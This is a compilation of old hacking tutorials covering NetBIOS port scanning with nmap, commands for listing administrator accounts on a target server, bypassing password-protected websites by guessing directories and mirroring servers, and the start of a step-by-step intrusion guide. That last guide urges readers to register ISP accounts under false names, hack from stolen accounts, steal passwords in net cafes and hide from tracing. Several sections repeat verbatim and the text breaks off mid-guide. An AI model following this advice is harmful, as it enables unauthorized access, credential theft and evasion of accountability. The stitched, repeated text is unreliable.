You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ <../sucks/index.shtml> .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.
How to use the Web to look up information on hacking
How to use the Web to look up information on hacking
____________________________________________________________
Want to become really, really unpopular? Try asking your hacker friends too many questions of the wrong sort.
But, but, how do we know what are the wrong questions to ask? OK, I sympathize with your problems because I get flamed a lot, too. That's partly because I sincerely believe in asking dumb questions. I make my living asking dumb questions. People pay me lots of money to go to conferences, call people on the phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them. And, guess what, sometimes the dumbest questions get you the best answers. So that's why you don't see me flaming people who ask dumb questions.
********************************************************
Newbie note: Have you been too afraid to ask the dumb question, "What is a flame?" Now you get to find out! It is a bunch of obnoxious rantings and ravings made in email or a Usenet post by some idiot who thinks he or she is proving his or her mental superiority through use of foul and/or impolite language such as "you suffer from rectocranial inversion," f*** y***, d****, b****, and of course @#$%^&*! This newbie note is my flame against those flamers to whom I am soooo superior.
********************************************************
But even though dumb questions can be good to ask, you may not like the flames they bring down on you. So, if you want to avoid flames, how do you find out answers for yourself?
This Guide covers one way to find out hacking information without having to ask people questions: by surfing the Web. The other way is to buy lots and lots of computer manuals, but that costs a lot of money. Also, in some parts of the world it is difficult to get manuals. Fortunately, however, almost anything you want to learn about computers and communications is available for free somewhere on the Web.
First, let's consider the Web search engines. Some just help you search the Web itself. But others enable you to search Usenet newsgroups that have been archived for many years back. Also, the best hacker email lists are archived on the Web, as well.
More how to search for hacker knowledge...
There are two major considerations in using Web search engines. One is what search engine to use, and the other is the search tactics themselves.
I have used many Web search engines. But eventually I came to the conclusion that for serious research, you only need two: Alavista (
But just how do you efficiently use these search engines? If you ask them to find "hacker" or even "how to hack," you will get bazillions of Web sites and news group posts to read. OK, so you painfully surf through one hacker Web site after another. You get portentous-sounding organ music, skulls with red rolling eyes, animated fires burning, and each site has links to other sites with pretentious music and ungrammatical boastings about "I am 31337, d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my $%^&&*!" But somehow they don't seem to have any actual information. Hey, welcome to the wannabe hacker world!
You need to figure out some words that help the search engine of your choice get more useful results. For example, let's say you want to find out whether I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or merely some poser. Now the luser approach would to simply go to http://www.dejanews.com and do a search of Usenet news groups for "Carolyn Meinel," being sure to click the "old" button to bring up stuff from years back. But if you do that, you get this huge long list of posts, most of which have nothing to do with hacking:
CDMA vs GSM - carolyn meinel 1995/11/17
Re: October El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20
Re: Internic Wars MrGlucroft@psu.edu (The Reaver) 1995/11/30
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16
Re: Lyndon LaRouche - who is he? lness@ucs.indiana.edu (lester john ness) 1996/01/06
U-B Color Index observation data - cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13
Re: Mars Fraud? History of one scientist involved gksmiley@aol.com (GK Smiley) 1996/08/11
Re: Mars Life Announcement: NO Fraud Issue twitch@hub.ofthe.net 1996/08/12
Hackers Helper E-Zine wanted - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06
Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node) 1996/12/12
Anyhow, this list goes on and on and on.
But if you specify "Carolyn Meinel hacker" and click "all" instead of "any" on the "Boolean" button, you get a list that starts with:
Media: "Unamailer delivers Christmas grief" -Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30 Cu Digest, #8.93, Tue 31 Dec 96 - Cu Digest (tk0jut2@mvs.cso.niu.edu)
1996/12/31
RealAudio interview with Happy Hacker - bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08
Etc.
This way all those posts about my boring life in the world of science don't show up, just the juicy hacker stuff.
Now suppose all you want to see is flames about what a terrible hacker I am. You could bring those to the top of the list by adding (with the "all" button still on) "flame" or "f***" or "b****" being careful to spell out those bad words instead fubarring them with ****s. For example, a search on "Carolyn Meinel hacker flame" with Boolean "all" turns up only one post. This important tome says the Happy Hacker list is a dire example of what happens when us prudish moderator types censor naughty words and inane diatribes.
******************************************
Newbie note: "Boolean" is math term. On the Dejanews search engine they figure the user doesn't have a clue of what "Boolean" means so they give you a choice of "any" or "all" and then label it "Boolean" so you feel stupid if you don't understand it. But in real Boolean algebra we can use the operators "and" "or" and "not" on word searches (or any searches of sets). "And" means you would have a search that turns up only items that have "all" the terms you specify; "or" means you would have a search that turns up "any" of the terms. The "not" operator would exclude items that included the "not" term even if they have any or all of the other search terms. Altavista has real Boolean algebra under its "advanced"" search option.
******************************************
But let's forget all those Web search engines for a minute. In my humble yet old-fashioned opinion, the best way to search the Web is to use it exactly the way its inventor, Tim Berners-Lee, intended. You start at a good spot and then follow the links to related sites. Imagine that!
Here's another of my old fogie tips. If you want to really whiz around the Web, and if you have a shell account, you can do it with the program lynx. At the prompt, just type "lynx followed by the URL you want to visit. Because lynx only shows text, you don't have to waste time waiting for the
More how to search for hacker knowledge...
So where are good places to start? Simply surf over to the Web sites listed at the end of this Guide. Not only do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker, as well as links to other quality sites. My favorites are http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org
Warning: parental discretion advised. You'll see some other great starting points elsewhere in this Guide, too.
Next, consider one of the most common questions I get: "How do I break into a computer????? :( :("
Ask this of someone who isn't a super nice elderly lady like me and you will get a truly rude reaction. Here's why. The world is full of many kinds of computers running many kinds of software on many kinds of networks. How you break into a computer depends on all these things. So you need to thoroughly study a computer system before you an even think about planning a strategy to break into it. That's one reason breaking into computers is widely regarded as the pinnacle of hacking. So if you don't realize even this much, you need to do lots and lots of homework before you can even dream of breaking into computers.
But, OK, I'll stop hiding the secrets of universal computer breaking and entry. Check out:
Bugtraq archives:
NT Bugtraq archives:
***************************************************
You can go to jail warning: If you want to take up the sport of breaking into computers, you should either do it with your own computer, or else get the permission of the owner if you want to break into someone else's computer. Otherwise you are violating the law. In the US, if you break into a computer that is across a state line from where you launch your attack, you are committing a Federal felony. If you cross national boundaries to hack, remember that most nations have treaties that allow them to extradite criminals from each others' countries.
***************************************************
Wait just a minute, if you surf over to those site you won't instantly become an Ubercracker. Unless you already are an excellent programmer and knowledgeable in Unix or Windows NT, you will discover the information at these two sites will *NOT* instantly grant you access to any victim computer you may choose. It's not that easy. You are going to have to learn how to program. Learn at least one operating system inside and out.
Of course some people take the shortcut into hacking. They get their phriends to give them a bunch of canned break-in programs. Then they try them on one computer after another until they stumble into root and accidentally delete system files. The they get busted and run to the Electronic Freedom Foundation and whine about how the Feds are persecuting them.
So are you serious? Do you *really* want to be a hacker badly enough to learn an operating system inside and out? Do you *really* want to populate your dreaming hours with arcane communications protocol topics? The old-fashioned, and super expensive way is to buy and study lots of manuals. Look, I'm a real believer in manuals. I spend about $200 per month on them. I read them in the bathroom, while sitting in traffic jams, and while waiting for doctor's appointments. But if I'm at my desk, I prefer to read manuals and other technical documents from the Web. Besides, the Web stuff is free!
The most fantastic Web resource for the aspiring geek, er, hacker, is the RFCs. RFC stands for "Request for Comment." Now this sounds like nothing more than a discussion group. But actually RFCs are the definitive documents that tell you how the Internet works. The funny name "RFC" comes from ancient history when lots of people were discussing how the heck to make that ARPAnet thingy work. But nowadays RFC means "Gospel Truth about How the Internet Works" instead of "Hey Guys, Let's Talk this Stuff Over."
********************************************************
Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment launched in 1969 that evolved into the Internet. When you read RFCs you will often find references to ARPAnet and ARPA -- or sometimes DARPA. That "D" stands for "defense." DARPA/ARPA keeps on getting its name changed between these two. For example, when Bill Clinton became US President in 1993, he changed DARPA back to ARPA because "defense" is a Bad Thing. Then in 1996 the US Congress passed a law changing it back to DARPA because "defense" is a Good Thing.
********************************************************
Now ideally you should simply read and memorize all the RFCs. But there are zillions of RFCs and some of us need to take time out to eat and sleep. So those of us without photographic memories and gobs of free time need to be selective about what we read. So how do we find an RFC that will answer whatever is our latest dumb question?
One good starting place is a complete list of all RFCs and their titles at ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index. Although this is an ftp (file transfer protocol) site, you can access it with your Web browser.
(Sorry, that above location is now gone. Nowadays you can find an organized set of RFCs hyperlinked together at Connected: An Internet Encyclopedia ,
Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify the status of RFCs and to provide some guidance for the authors of RFCs in the future. It is in a sense a specification for RFCs." To find this RFC, or in fact any RFC for which you have its number, just go to Altavista and search for "RFC 825" or whatever the number is. Be sure to put it in quotes just like this example in order to get the best results.
Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know which RFC to read to get an answer to our questions? Guess what, there is solution, a fascinating group of RFCs called "FYIs" Rather than specifying anything, FYIs simply help explain the other RFCs. How do you get FYIs? Easy! I just surfed over to the RFC on FYIs (1150) and learned that:
FYIs can be obtained via FTP from NIC.DDN.MIL, with the pathname FYI:mm.TXT, or RFC:RFCnnnn.TXT (where "mm" refers to the number of the FYI and "nnnn" refers to the number of the RFC). Login with FTP, username ANONYMOUS and password GUEST. The NIC also provides an automatic mail service for those sites which cannot use FTP. Address the request to SERVICE@NIC.DDN.MIL and in the subject field of the message indicate the FYI or RFC number, as in "Subject: FYI mm" or "Subject: RFC nnnn".
But even better than this is an organized set of RFCs hyperlinked together on the Web at http://www.FreeSoft.org/Connected/. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Admittedly it doesn't contain all the RFCs. But it has a tutorial and a newbie-friendly set of links through the most important RFCs.
Last but not least, you can check out two sites that offer a wealth of technical information on computer security:
http://csrc.nist.gov/secpubs/rainbow/
http://GANDALF.ISU.EDU/security/security.html security library
I hope this is enough information to keep you busy studying for the next five or ten years. But please keep this in mind. Sometimes it's not easy to figure something out just by reading huge amounts of technical information. Sometimes it can save you a lot of grief just to ask a question. Even a dumb question. Hey, how would you like to check out the Web site for those of us who make our living asking people dumb questions? Surf over to http://www.scip.org. That's the home page of the Society of Competitive Information Professionals, the home organization for folks like me. So, go ahead, make someone's day. Have phun asking those dumb questions. Just remember to fireproof your phone and computer first!
____________________________________________________________
Want to become really, really unpopular? Try asking your hacker friends too many questions of the wrong sort.
But, but, how do we know what are the wrong questions to ask? OK, I sympathize with your problems because I get flamed a lot, too. That's partly because I sincerely believe in asking dumb questions. I make my living asking dumb questions. People pay me lots of money to go to conferences, call people on the phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them. And, guess what, sometimes the dumbest questions get you the best answers. So that's why you don't see me flaming people who ask dumb questions.
********************************************************
Newbie note: Have you been too afraid to ask the dumb question, "What is a flame?" Now you get to find out! It is a bunch of obnoxious rantings and ravings made in email or a Usenet post by some idiot who thinks he or she is proving his or her mental superiority through use of foul and/or impolite language such as "you suffer from rectocranial inversion," f*** y***, d****, b****, and of course @#$%^&*! This newbie note is my flame against those flamers to whom I am soooo superior.
********************************************************
But even though dumb questions can be good to ask, you may not like the flames they bring down on you. So, if you want to avoid flames, how do you find out answers for yourself?
This Guide covers one way to find out hacking information without having to ask people questions: by surfing the Web. The other way is to buy lots and lots of computer manuals, but that costs a lot of money. Also, in some parts of the world it is difficult to get manuals. Fortunately, however, almost anything you want to learn about computers and communications is available for free somewhere on the Web.
First, let's consider the Web search engines. Some just help you search the Web itself. But others enable you to search Usenet newsgroups that have been archived for many years back. Also, the best hacker email lists are archived on the Web, as well.
More how to search for hacker knowledge...
There are two major considerations in using Web search engines. One is what search engine to use, and the other is the search tactics themselves.
I have used many Web search engines. But eventually I came to the conclusion that for serious research, you only need two: Alavista (
But just how do you efficiently use these search engines? If you ask them to find "hacker" or even "how to hack," you will get bazillions of Web sites and news group posts to read. OK, so you painfully surf through one hacker Web site after another. You get portentous-sounding organ music, skulls with red rolling eyes, animated fires burning, and each site has links to other sites with pretentious music and ungrammatical boastings about "I am 31337, d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my $%^&&*!" But somehow they don't seem to have any actual information. Hey, welcome to the wannabe hacker world!
You need to figure out some words that help the search engine of your choice get more useful results. For example, let's say you want to find out whether I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or merely some poser. Now the luser approach would to simply go to http://www.dejanews.com and do a search of Usenet news groups for "Carolyn Meinel," being sure to click the "old" button to bring up stuff from years back. But if you do that, you get this huge long list of posts, most of which have nothing to do with hacking:
CDMA vs GSM - carolyn meinel
Re: October El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20
Re: Internic Wars MrGlucroft@psu.edu (The Reaver) 1995/11/30
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16
Re: Lyndon LaRouche - who is he? lness@ucs.indiana.edu (lester john ness) 1996/01/06
U-B Color Index observation data - cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13
Re: Mars Fraud? History of one scientist involved gksmiley@aol.com (GK Smiley) 1996/08/11
Re: Mars Life Announcement: NO Fraud Issue twitch@hub.ofthe.net 1996/08/12
Hackers Helper E-Zine wanted - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06
Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node) 1996/12/12
Anyhow, this list goes on and on and on.
But if you specify "Carolyn Meinel hacker" and click "all" instead of "any" on the "Boolean" button, you get a list that starts with:
Media: "Unamailer delivers Christmas grief" -Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30 Cu Digest, #8.93, Tue 31 Dec 96 - Cu Digest (tk0jut2@mvs.cso.niu.edu)
RealAudio interview with Happy Hacker - bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08
Etc.
This way all those posts about my boring life in the world of science don't show up, just the juicy hacker stuff.
Now suppose all you want to see is flames about what a terrible hacker I am. You could bring those to the top of the list by adding (with the "all" button still on) "flame" or "f***" or "b****" being careful to spell out those bad words instead fubarring them with ****s. For example, a search on "Carolyn Meinel hacker flame" with Boolean "all" turns up only one post. This important tome says the Happy Hacker list is a dire example of what happens when us prudish moderator types censor naughty words and inane diatribes.
******************************************
Newbie note: "Boolean" is math term. On the Dejanews search engine they figure the user doesn't have a clue of what "Boolean" means so they give you a choice of "any" or "all" and then label it "Boolean" so you feel stupid if you don't understand it. But in real Boolean algebra we can use the operators "and" "or" and "not" on word searches (or any searches of sets). "And" means you would have a search that turns up only items that have "all" the terms you specify; "or" means you would have a search that turns up "any" of the terms. The "not" operator would exclude items that included the "not" term even if they have any or all of the other search terms. Altavista has real Boolean algebra under its "advanced"" search option.
******************************************
But let's forget all those Web search engines for a minute. In my humble yet old-fashioned opinion, the best way to search the Web is to use it exactly the way its inventor, Tim Berners-Lee, intended. You start at a good spot and then follow the links to related sites. Imagine that!
Here's another of my old fogie tips. If you want to really whiz around the Web, and if you have a shell account, you can do it with the program lynx. At the prompt, just type "lynx followed by the URL you want to visit. Because lynx only shows text, you don't have to waste time waiting for the
More how to search for hacker knowledge...
So where are good places to start? Simply surf over to the Web sites listed at the end of this Guide. Not only do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker, as well as links to other quality sites. My favorites are http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org
Warning: parental discretion advised. You'll see some other great starting points elsewhere in this Guide, too.
Next, consider one of the most common questions I get: "How do I break into a computer????? :( :("
Ask this of someone who isn't a super nice elderly lady like me and you will get a truly rude reaction. Here's why. The world is full of many kinds of computers running many kinds of software on many kinds of networks. How you break into a computer depends on all these things. So you need to thoroughly study a computer system before you an even think about planning a strategy to break into it. That's one reason breaking into computers is widely regarded as the pinnacle of hacking. So if you don't realize even this much, you need to do lots and lots of homework before you can even dream of breaking into computers.
But, OK, I'll stop hiding the secrets of universal computer breaking and entry. Check out:
Bugtraq archives:
NT Bugtraq archives:
***************************************************
You can go to jail warning: If you want to take up the sport of breaking into computers, you should either do it with your own computer, or else get the permission of the owner if you want to break into someone else's computer. Otherwise you are violating the law. In the US, if you break into a computer that is across a state line from where you launch your attack, you are committing a Federal felony. If you cross national boundaries to hack, remember that most nations have treaties that allow them to extradite criminals from each others' countries.
***************************************************
Wait just a minute, if you surf over to those site you won't instantly become an Ubercracker. Unless you already are an excellent programmer and knowledgeable in Unix or Windows NT, you will discover the information at these two sites will *NOT* instantly grant you access to any victim computer you may choose. It's not that easy. You are going to have to learn how to program. Learn at least one operating system inside and out.
Of course some people take the shortcut into hacking. They get their phriends to give them a bunch of canned break-in programs. Then they try them on one computer after another until they stumble into root and accidentally delete system files. The they get busted and run to the Electronic Freedom Foundation and whine about how the Feds are persecuting them.
So are you serious? Do you *really* want to be a hacker badly enough to learn an operating system inside and out? Do you *really* want to populate your dreaming hours with arcane communications protocol topics? The old-fashioned, and super expensive way is to buy and study lots of manuals.
The most fantastic Web resource for the aspiring geek, er, hacker, is the RFCs. RFC stands for "Request for Comment." Now this sounds like nothing more than a discussion group. But actually RFCs are the definitive documents that tell you how the Internet works. The funny name "RFC" comes from ancient history when lots of people were discussing how the heck to make that ARPAnet thingy work. But nowadays RFC means "Gospel Truth about How the Internet Works" instead of "Hey Guys, Let's Talk this Stuff Over."
********************************************************
Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment launched in 1969 that evolved into the Internet. When you read RFCs you will often find references to ARPAnet and ARPA -- or sometimes DARPA. That "D" stands for "defense." DARPA/ARPA keeps on getting its name changed between these two. For example, when Bill Clinton became US President in 1993, he changed DARPA back to ARPA because "defense" is a Bad Thing. Then in 1996 the US Congress passed a law changing it back to DARPA because "defense" is a Good Thing.
********************************************************
Now ideally you should simply read and memorize all the RFCs. But there are zillions of RFCs and some of us need to take time out to eat and sleep. So those of us without photographic memories and gobs of free time need to be selective about what we read. So how do we find an RFC that will answer whatever is our latest dumb question?
One good starting place is a complete list of all RFCs and their titles at ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index. Although this is an ftp (file transfer protocol) site, you can access it with your Web browser.
(Sorry, that above location is now gone. Nowadays you can find an organized set of RFCs hyperlinked together at Connected: An Internet Encyclopedia ,
Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify the status of RFCs and to provide some guidance for the authors of RFCs in the future. It is in a sense a specification for RFCs." To find this RFC, or in fact any RFC for which you have its number, just go to Altavista and search for "RFC 825" or whatever the number is. Be sure to put it in quotes just like this example in order to get the best results.
Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know which RFC to read to get an answer to our questions? Guess what, there is solution, a fascinating group of RFCs called "FYIs" Rather than specifying anything, FYIs simply help explain the other RFCs. How do you get FYIs? Easy! I just surfed over to the RFC on FYIs (1150) and learned that:
FYIs can be obtained via FTP from NIC.DDN.MIL, with the pathname FYI:mm.TXT, or RFC:RFCnnnn.TXT (where "mm" refers to the number of the FYI and "nnnn" refers to the number of the RFC). Login with FTP, username ANONYMOUS and password GUEST. The NIC also provides an automatic mail service for those sites which cannot use FTP. Address the request to SERVICE@NIC.DDN.MIL and in the subject field of the message indicate the FYI or RFC number, as in "Subject: FYI mm" or "Subject: RFC nnnn".
But even better than this is an organized set of RFCs hyperlinked together on the Web at http://www.FreeSoft.org/Connected/. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Admittedly it doesn't contain all the RFCs. But it has a tutorial and a newbie-friendly set of links through the most important RFCs.
Last but not least, you can check out two sites that offer a wealth of technical information on computer security:
http://csrc.nist.gov/secpubs/rainbow/
http://GANDALF.ISU.EDU/security/security.html security library
I hope this is enough information to keep you busy studying for the next five or ten years. But please keep this in mind. Sometimes it's not easy to figure something out just by reading huge amounts of technical information. Sometimes it can save you a lot of grief just to ask a question. Even a dumb question. Hey, how would you like to check out the Web site for those of us who make our living asking people dumb questions? Surf over to http://www.scip.org. That's the home page of the Society of Competitive Information Professionals, the home organization for folks like me. So, go ahead, make someone's day. Have phun asking those dumb questions. Just remember to fireproof your phone and computer first!
hacking password protected site
There are many ways to defeat java-script protected web
sites. S ome are very simplistic, such as hitting ctl-alt-del
when the password box is displayed, to simply turning off
java capability, which will dump you into t he default page.
You can try manually searching for other directories, by
typing the directory name into the url address box of your
browser, ie: you w ant access to www.target.com . Try typing
www.target.com/images .(almost ever y web site has an images
directory) This will put you into the images directo ry,
and give you a text list of all the images located there.
Often, the t itle of an image will give you a clue to the
name of another directory. ie: in www.target.com/images,
there is a .gif named gamestitle.gif . There is a g ood
chance then, that there is a 'games' directory on the site,
so you wou ld then type in www.target.com/games, and if it is
a valid directory, you aga in get a text listing of all thefiles available there.
For a more automated a pproach, use a program like WEB SNAKE
from anawave, or Web Wacker. These pro grams will create a
mirror image of an entire web site, showing all director ies,
or even mirror a complete server. They are indispensable for
locating hidden files and directories.
What do you do if you can't get past an openin g "Password
Required" box? First do an WHOIS Lookup for the site. In our
example, www.target.com . We find it's hosted by www.host.com
at 100.100.100. 1. We then go to 100.100.100.1, and then launch \
Web Snake, and mirror the e ntire server. Set Web Snake to NOT
download anything over about 20K. (not ma ny HTML pages are
bigger than this) This speeds things up some, and keeps yo u
from getting a lot of files and images you don't care about.
This can take a long time, so consider running it right before bed time.
Once you have an image of the entire server, you look through
the directories listed, and find /target. When we open that
directory, we find its contents, and all of i ts sub-directories listed.
Let's say we find /target/games/zip/zipindex.html . This would be the index
page that would be displayed had you gone through the
password procedure, and allowed it to redirect you here.
By simply typ ing in the url
www.target.com/games/zip/zipindex.html you will be on
the index page and ready to follow the links for downloading.
sites. S ome are very simplistic, such as hitting ctl-alt-del
when the password box is displayed, to simply turning off
java capability, which will dump you into t he default page.
You can try manually searching for other directories, by
typing the directory name into the url address box of your
browser, ie: you w ant access to www.target.com . Try typing
www.target.com/images .(almost ever y web site has an images
directory) This will put you into the images directo ry,
and give you a text list of all the images located there.
Often, the t itle of an image will give you a clue to the
name of another directory. ie: in www.target.com/images,
there is a .gif named gamestitle.gif . There is a g ood
chance then, that there is a 'games' directory on the site,
so you wou ld then type in www.target.com/games, and if it is
a valid directory, you aga in get a text listing of all thefiles available there.
For a more automated a pproach, use a program like WEB SNAKE
from anawave, or Web Wacker. These pro grams will create a
mirror image of an entire web site, showing all director ies,
or even mirror a complete server. They are indispensable for
locating hidden files and directories.
What do you do if you can't get past an openin g "Password
Required" box? First do an WHOIS Lookup for the site. In our
example, www.target.com . We find it's hosted by www.host.com
at 100.100.100. 1. We then go to 100.100.100.1, and then launch \
Web Snake, and mirror the e ntire server. Set Web Snake to NOT
download anything over about 20K. (not ma ny HTML pages are
bigger than this) This speeds things up some, and keeps yo u
from getting a lot of files and images you don't care about.
This can take a long time, so consider running it right before bed time.
Once you have an image of the entire server, you look through
the directories listed, and find /target. When we open that
directory, we find its contents, and all of i ts sub-directories listed.
Let's say we find /target/games/zip/zipindex.html . This would be the index
page that would be displayed had you gone through the
password procedure, and allowed it to redirect you here.
By simply typ ing in the url
www.target.com/games/zip/zipindex.html you will be on
the index page and ready to follow the links for downloading.
hacking in telnet ftp
[I Want to Start at the Start]
[I Want to Go Straight to Hacking]
INTRODUCTION:
A little background is needed before we get into hacking techniques.
When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the froggy.com.au ISP (Internet Service Provider), he will be given:
(1) a login name, which is like the name of your directory; and
(2) a password, which lets you get access to that directory.
This login name and password will usually give you access to all of Fred’s services - his mail, news services and web pages. There is also the ‘root’ account, which has it’s own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’, in this help file.
[Ok, I want to move to the 'anatomy of the hack']
[I know all this, let me move straight to hacking]
[
I don't have a clue what you're on about, let me read some backgroundon this so called "Internet" you keep referring to]
THE ANATOMY OF THE 'HACK':
There are two main ways to break into a system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You can try to get in by finding the combination of the vault. This is like finding the password. It’s how you are meant to get in. The second way is by using dynamite. You forget all about the ‘proper’ way to get in. This is like using ‘exploits’, or weaknesses in the servers operating system to gain access.
[Ok, Let's Go. Tell Me About Not Getting Caught]
[Stuff it, I know how to not get caught, on to the techniques!]
'DON'T GET CAUGHT':
Hacking is illegal, and it is very easy to trace you if froggy.com.au realizes you hacked them. Wherever you go,
your IP number (your computer’s unique identification) is left and often logged. Solutions:
1. When you set up your account with an ISP, give a false name and address.
[Nah, I can't be bothered, what other things can I do?]
[Ok, I used this trick. What else can I do?]
[Stuff it, I know how to not get caught, on to the techniques!]
'DON'T GET CAUGHT':
2. Hack using a filched account (stolen password, etc.). A tool called Dripper can steal passwords for you from public net cafes and libraries.
[Nah, just tell me something easy I can do right now]
[Ok, done. Anything else I should do?]
'DON'T GET CAUGHT':
3. Port your connection through something else.
An easy way to do this is to change your proxy settings. By using the proxy settings meant for a different ISP, it can look like you are surfing from wherever that ISP is. A list of proxies you can use is here.
You should also do any important info gathering through the IP Jamming Applet on the Cyberarmy.Com to hide your IP.
If you want super anonymity, you should be surfing in an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.
[I don't understand about the proxy settings thing, let me read more]
[Ok, I am wired for hyper stealth... Now, I want to HACK!]
INFO GATHERING:
To start off, you will probably need to gather information about www.froggy.com.au using internet tools.
[Ok, how?]
[Give me some reading to do about info gathering]
[No, I've already got all the info, just tell me what to do]
DIRT DIGGING STAGE:
We are now taking the first steps of any hack... Info Gathering.
You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring the www.froggy.com.au 's web page up in the IP Jammer's window. You can load the IP Jamming applet on the Cyberarmy.Com.
[Ok, What Now?]
CASE THE JOINT:
1. First, check out the site. Take down any email addresses, copy down the HTML of important pages.
[Done... What Else?]
THE OLD BOUNCING MAIL TRICK:
2. Send a mail that will bounce to the site. If the site is www.froggy.com.au , send a mail to blahblahblah@froggy.com.au . It will bounce back to you and give you information in its header.
Copy the information from the headers down.
(To maintain anonymity, it might be a good idea to send and receive the mail from a free web based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through the logs after they are hacked.)
[Done... What Else?]
TRACEROUTE:
